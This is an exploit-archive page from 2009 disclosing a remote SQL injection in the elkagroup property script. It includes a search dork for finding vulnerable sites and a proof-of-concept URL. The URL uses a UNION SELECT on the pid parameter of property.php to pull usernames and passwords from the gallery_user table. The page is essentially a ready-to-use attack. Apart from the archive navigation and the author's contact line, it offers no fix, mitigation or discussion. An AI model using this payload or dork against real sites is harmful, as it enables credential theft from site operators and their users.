[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : elkagroup (pid ) Remote SQL Injection Vulnerability
# Published : 2009-12-30
# Author : Hussin X
# Previous Title : Jax Calendar 1.34 Remote Admin Access Exploit
# Next Title : jgbbs-3.0beta1 DB Download Vulnerability
elkagroup (pid ) Remote SQL Injection Vulnerability
|| Author: Hussin X
|| Home : WwW.IQ-TY.CoM<http://WwW.IQ-TY.CoM>
|| email: darkangel_g85[at]Yahoo[DoT]com
||| script : http://www.elkapax.com & http://www.elkagroup.com
||| DorK : "Powered by : elkagroup.com<http://elkagroup.com>"
POC
________
http://[server]/[path]/property.php?cid=12&uid=0&pid=-168+union+select+1,username,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17+from+gallery_user--
end
IQ-SecuritY FoRuM